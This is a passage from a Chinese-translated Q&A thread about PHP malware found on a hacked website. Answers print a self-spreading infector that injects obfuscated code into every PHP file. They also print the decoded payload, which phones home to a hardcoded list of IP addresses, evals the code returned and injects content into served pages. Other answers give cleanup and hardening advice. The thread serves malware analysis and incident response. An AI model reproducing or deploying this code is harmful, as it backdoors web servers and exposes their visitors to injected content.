        $code_t = 'if (!function_exists("GetMama")){  function mod_con($buf){str_ireplace("<body>","<body>",$buf,$cnt_h);if ($cnt_h == 1) {$buf = str_ireplace("<body>","<body>" . stripslashes($_SERVER["good"]),$buf); return $buf;}str_ireplace("</body>","</body>",$buf,$cnt_h);if ($cnt_h == 1) {$buf = str_ireplace("</body>",stripslashes($_SERVER["good"])."</body>",$buf); return $buf;}return $buf;}function opanki($buf){$gz_e = false;$h_l = headers_list();if (in_array("Content-Encoding: gzip", $h_l)) { $gz_e = true;}if ($gz_e){$tmpfname = tempnam("/tmp", "FOO");file_put_contents($tmpfname, $buf);$zd = gzopen($tmpfname, "r");$contents = gzread($zd, 10000000);$contents = mod_con($contents);gzclose($zd);unlink($tmpfname);$contents = gzencode($contents);} else {$contents = mod_con($buf);}$len = strlen($contents);header("Content-Length: ".$len);return($contents);} function GetMama(){$mother = "###";return $mother;}ob_start("opanki");function ahfudflfzdhfhs($pa){$mama = GetMama();$file = urlencode(__FILE__);if (isset($_SERVER["HTTP_HOST"])){$host = $_SERVER["HTTP_HOST"];} else {$host = "";}if (isset($_SERVER["REMOTE_ADDR"])){$ip = $_SERVER["REMOTE_ADDR"];} else {$ip = "";}if (isset($_SERVER["HTTP_REFERER"])){$ref = urlencode($_SERVER["HTTP_REFERER"]);} else {$ref = "";}if (isset($_SERVER["HTTP_USER_AGENT"])){$ua = urlencode(strtolower($_SERVER["HTTP_USER_AGENT"]));} else {$ua = "";}if (isset($_SERVER["QUERY_STRING"])){$qs = urlencode($_SERVER["QUERY_STRING"]);} else {$qs = "";}$url_0 = "http://" . $pa;$url_1 = "/jedi.php?version=0991&mother=" .$mama . "&file=" . $file . "&host=" . $host . "&ip=" . $ip . "&ref=" . $ref . "&ua=" .$ua . "&qs=" . $qs;$try = true;if( function_exists("curl_init") ){$ch = curl_init($url_0 . $url_1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_TIMEOUT, 3);$ult = trim(curl_exec($ch));$try = false;} if ((ini_get("allow_url_fopen")) && $try) {$ult = trim(@file_get_contents($url_0 . $url_1));$try = false;}if($try){$fp = fsockopen($pa, 80, $errno, $errstr, 30);if ($fp) {$out = "GET $url_1 HTTP/1.0\r\n";$out .= "Host: $pa\r\n";$out .= "Connection: Close\r\n\r\n";fwrite($fp, $out);$ret = "";while (!feof($fp)) {$ret  .=  fgets($fp, 128);}fclose($fp);$ult = trim(substr($ret, strpos($ret, "\r\n\r\n") + 4));}}  if (strpos($ult,"eval") !== false){$z = stripslashes(str_replace("eval","",$ult)); eval($z); exit();}if (strpos($ult,"ebna") !== false){$_SERVER["good"] = str_replace("ebna","",$ult);return true;}else {return false;}}$father2[] = "78.46.173.14";$father2[] = "176.9.218.191";$father2[] = "91.228.154.254";$father2[] = "77.81.241.253";$father2[] = "184.82.117.110";$father2[] = "46.4.202.93";$father2[] = "46.249.58.135";$father2[] = "176.9.241.150";$father2[] = "46.37.169.56";$father2[] = "46.30.41.99";$father2[] = "94.242.255.35";$father2[] = "178.162.129.223";$father2[] = "78.47.184.33";$father2[] = "31.184.234.96";shuffle($father2);foreach($father2 as $ur){if ( ahfudflfzdhfhs($ur) ) { break ;}}}';
        $mama = 'wtf';
        $mama = $_SERVER["HTTP_HOST"];
        $code_t = str_replace('###', $mama, $code_t);
        $code = '<'.'?php ';

        $prob = rand(5, 500);

        for ($i = 0; $i < 700 + $prob; $i++) {
            $code = $code.' ';
        }


        $code_t = Codee($code_t);


        $code = $code.'/*'.$md.'_on*/ '.$code_t.' /*'.$md.'_off*/'.' ?>'.$tmp;

        $f = fopen($fname, "w");
        fputs($f, $code);
        fclose($f);
    }
    chmod($fname, 0644);

}

function dir_num($dir) {
    global $fileslist;
    static $deep = 0;

    $odir = @opendir($dir);

    while (($file = @readdir($odir)) !== FALSE) {
        if ($file == '.' || $file == '..') {
            continue;
        } else {
            echo '. ';
            if (
            get_file_extension($file) == 'php') {
                modify($dir.DIRECTORY_SEPARATOR.$file);
            }
        }

        if (is_dir($dir.DIRECTORY_SEPARATOR.$file)) {
            $deep++;
            dir_num($dir.DIRECTORY_SEPARATOR.$file);
            $deep--;
        }
    }@closedir($odir);
}

Echo 'Wait please...<br>';

$dir = dirname(__FILE__);
dir_num($dir);



echo '<script>window.location.reload();</script>';
exit();

在这一部分中,脚本尝试php在当前目录和子目录中查找其他文件并感染它们。

于 2012-04-09T19:53:55.043 回答
5

我想说删除所有类似的片段,更改所有密码,如果可能的话,让您的网站离线,直到支持可以回复您。它确实看起来不太好,在对代码和解码进行了一些挖掘之后,我发现了这个:

<?php 

if (!function_exists("GetMama")){
    function mod_con($buf){
        str_ireplace("<body>","<body>",$buf,$cnt_h);if ($cnt_h == 1) {
            $buf = str_ireplace("<body>","<body>" . stripslashes($_SERVER["good"]),$buf); return $buf;
        }str_ireplace("</body>","</body>",$buf,$cnt_h);if ($cnt_h == 1) {
            $buf = str_ireplace("</body>",stripslashes($_SERVER["good"])."</body>",$buf); return $buf;
        }return $buf;
    }function opanki($buf){
        $gz_e = false;$h_l = headers_list();if (in_array("Content-Encoding: gzip", $h_l)) {
            $gz_e = true;
        }if ($gz_e){
            $tmpfname = tempnam("/tmp", "FOO");file_put_contents($tmpfname, $buf);$zd = gzopen($tmpfname, "r");$contents = gzread($zd, 10000000);$contents = mod_con($contents);gzclose($zd);unlink($tmpfname);$contents = gzencode($contents);
        } else {$contents = mod_con($buf);
        }$len = strlen($contents);header("Content-Length: ".$len);return($contents);
    } function GetMama(){
        $mother = "www.99bits.com";return $mother;
    }ob_start("opanki");function ahfudflfzdhfhs($pa){
        $mama = GetMama();$file = urlencode(__FILE__);if (isset($_SERVER["HTTP_HOST"])){
            $host = $_SERVER["HTTP_HOST"];
        } else {$host = "";
        }if (isset($_SERVER["REMOTE_ADDR"])){
            $ip = $_SERVER["REMOTE_ADDR"];
        } else {$ip = "";
        }if (isset($_SERVER["HTTP_REFERER"])){
            $ref = urlencode($_SERVER["HTTP_REFERER"]);
        } else {$ref = "";
        }if (isset($_SERVER["HTTP_USER_AGENT"])){
            $ua = urlencode(strtolower($_SERVER["HTTP_USER_AGENT"]));
        } else {$ua = "";
        }if (isset($_SERVER["QUERY_STRING"])){
            $qs = urlencode($_SERVER["QUERY_STRING"]);
        } else {$qs = "";
        }$url_0 = "http://" . $pa;$url_1 = "/jedi.php?version=0991&mother=" .$mama . "&file=" . $file . "&host=" . $host . "&ip=" . $ip . "&ref=" . $ref . "&ua=" .$ua . "&qs=" . $qs;$try = true;if( function_exists("curl_init") ){
            $ch = curl_init($url_0 . $url_1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_TIMEOUT, 3);$ult = trim(curl_exec($ch));$try = false;
        } if ((ini_get("allow_url_fopen")) && $try) {
            $ult = trim(@file_get_contents($url_0 . $url_1));$try = false;
        }if($try){
            $fp = fsockopen($pa, 80, $errno, $errstr, 30);if ($fp) {
                $out = "GET $url_1 HTTP/1.0\r\n";$out .= "Host: $pa\r\n";$out .= "Connection: Close\r\n\r\n";fwrite($fp, $out);$ret = "";while (!feof($fp)) {
                    $ret  .=  fgets($fp, 128);
                }fclose($fp);$ult = trim(substr($ret, strpos($ret, "\r\n\r\n") + 4));
            }
        }  if (strpos($ult,"eval") !== false){
            $z = stripslashes(str_replace("eval","",$ult)); eval($z); exit();
        }if (strpos($ult,"ebna") !== false){
            $_SERVER["good"] = str_replace("ebna","",$ult);return true;
        }else {return false;
        }
    }$father2[] = "78.46.173.14";$father2[] = "176.9.218.191";$father2[] = "91.228.154.254";$father2[] = "77.81.241.253";$father2[] = "184.82.117.110";$father2[] = "46.4.202.93";$father2[] = "46.249.58.135";$father2[] = "176.9.241.150";$father2[] = "46.37.169.56";$father2[] = "46.30.41.99";$father2[] = "94.242.255.35";$father2[] = "178.162.129.223";$father2[] = "78.47.184.33";$father2[] = "31.184.234.96";shuffle($father2);foreach($father2 as $ur){
        if ( ahfudflfzdhfhs($ur) ) {
            break ;
        }
    }
}
于 2012-04-09T19:08:24.960 回答
1

来自安全背景,我很确定您的网络服务器已被黑客入侵。首先,调查源头通常是一个好主意,以防止再次发生该错误。

首先:

  • 查找通过时间戳感染的第一个文件。
  • 记录活动的运行脚本以确定导致此问题的原因或 PHP 日志中的错误等。

如果您使用的是共享主机,那么您无能为力,共享主机用户通常更容易被破解,但如果您使用的是 VPS 或更好的主机,您可以联系您的主机以防托管主机完整的格式或必要的安全性固定。

然而,问题是删除这些片段在 99.99% 的情况下是没有用的,它不会阻止未来的破解。更改密码会有所帮助,但这又不是一个可靠的解决方案。

如果您有资源,请聘请安全专家进行快速审核。许多人只有在发现弱点时才要求付款。如果没有,请重新评估服务器中的潜在弱点。有关 Linux 服务器,请参阅这个 (http://www.thegeekstuff.com/2011/03/apache-hardening) 如果您使用的是 Windows,请告诉我,我也会将您链接到一些 Windows IIS。

很高兴我能帮上忙!

于 2012-04-09T19:45:47.327 回答
0

它似乎是一个注入到您的站点的 php 类型的 shell 脚本。这可能是网络托管公司或您的个人网络应用程序允许黑客攻击发生的漏洞。

于 2012-04-09T19:08:15.820 回答